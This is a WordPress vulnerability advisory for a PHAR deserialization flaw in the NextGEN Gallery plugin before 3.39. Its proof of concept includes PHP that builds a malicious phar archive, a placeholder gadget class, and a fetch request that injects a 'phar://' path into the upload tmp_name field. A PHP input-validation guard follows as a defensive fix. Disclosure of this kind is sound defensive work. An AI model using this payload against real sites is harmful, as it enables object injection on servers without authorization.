WPVDB-ID: ED099489-1DB4-4B42-9F72-77DE39C9E01E
Source: wpvulndb
Reported by: Linwz from DEVCORE
History: Sep 25, 2023 - 12:00 a.m.

NextGEN Gallery < 3.39 - Admin+ PHAR Deserialization

Published: 2023-09-25 00:00:00
Author: Linwz from DEVCORE
Source: wpscan.com
Tags: wordpress, phar deserialization, arbitrary access

EPSS: 0.001 (Low), Percentile: 36.5%

Description

The plugin is vulnerable to PHAR Deserialization due to a lack of input parameter validation in the gallery_edit function, allowing an attacker to access arbitrary resources on the server.

PoC

1. Ensure your WordPress installation is using PHP version 7.4 or earlier.

2. Create a Gallery and note its ID.

3. Create a poc.phar file using the following code, and add it to the root directory of the server:

    try {
        $phar->startBuffering();
        $phar->addFromString('test.txt', 'text');
        $phar->setStub('');
        $phar->setMetadata(new Evil());
        $phar->stopBuffering();
        echo "$pharFile successfully created" . PHP_EOL;
    } catch (Exception $e) {
        echo $e->getMessage();
    }

4. Add the following code to the server to simulate a gadget:

    class Evil {
        function __wakeup() {
            die('Arbitrary deserialization');
        }
    }

5. Run the following code in your browser to see the deserialization occur, replacing ADMIN_USERNAME, ADMIN_PASSWORD, and GALLERY_ID accordingly.

    await (await fetch("/index.php", {
        "credentials": "include",
        "headers": {
            "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"
        },
        "body": 'photocrati_ajax=1&action=enqueue_nextgen_api_task_list&q=ADMIN_USERNAME&z=ADMIN_PASSWORD&app_config={}&task_list=[{"type":"gallery_edit","query":{"id":"GALLERY_ID"},"object":{"image_list":[{"action":"upload","data_key":"a","filename":"xxxxxxx.jpg"}]}}]&extra_data={"a":{"tmp_name":"phar://poc.phar/tmp.png"}}',
        "method": "POST",
        "mode": "cors"
    })).text();
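The root cause described above is a client-controlled tmp_name reaching filesystem functions unchecked. As an added defensive example (not code from the advisory or from NextGEN Gallery), the following guard rejects such a value before any file call touches it; the class name, the use of sys_get_temp_dir() and the sample array are assumptions for illustration.

```php
<?php
// Added example, not NextGEN Gallery code. A client-supplied
// extra_data[...]['tmp_name'] must never reach file_exists()/is_file()
// and friends unchecked: on PHP <= 7.4 a phar:// path makes those calls
// deserialize the archive's metadata. This guard admits only a plain
// local file inside a directory the server controls.
final class UploadPathGuard
{
    /** @var string Canonical temp directory, with trailing separator. */
    private $tmpDir;

    public function __construct(string $tmpDir)
    {
        $real = realpath($tmpDir);
        if ($real === false || !is_dir($real)) {
            throw new InvalidArgumentException("temp dir not found: $tmpDir");
        }
        $this->tmpDir = rtrim($real, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    }

    // Returns the canonical path, or null when the value must be rejected.
    public function resolve(string $tmpName): ?string
    {
        // 1. Any scheme (phar://, php://, data://, ...) is never a temp file.
        if (preg_match('#^[a-z][a-z0-9+.-]*://#i', $tmpName) === 1) {
            return null;
        }
        // 2. Canonicalise on the local filesystem and require a regular file.
        $real = realpath($tmpName);
        if ($real === false || !is_file($real)) {
            return null;
        }
        // 3. Containment: the file must sit inside our temp dir (blocks ../).
        if (strncmp($real, $this->tmpDir, strlen($this->tmpDir)) !== 0) {
            return null;
        }
        return $real;
    }
}

// Constructed sample mirroring the PoC request; assumed extraction point.
$extraData = ['a' => ['tmp_name' => 'phar://poc.phar/tmp.png']];
$guard = new UploadPathGuard(sys_get_temp_dir());
$tmpName = $guard->resolve((string) ($extraData['a']['tmp_name'] ?? ''));
if ($tmpName === null) {
    http_response_code(400);
    exit('invalid tmp_name');
}
// Independent second layer when nothing needs the phar:// wrapper:
// stream_wrapper_unregister('phar');
```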

CPE
Operator: eq
Version: 3.39

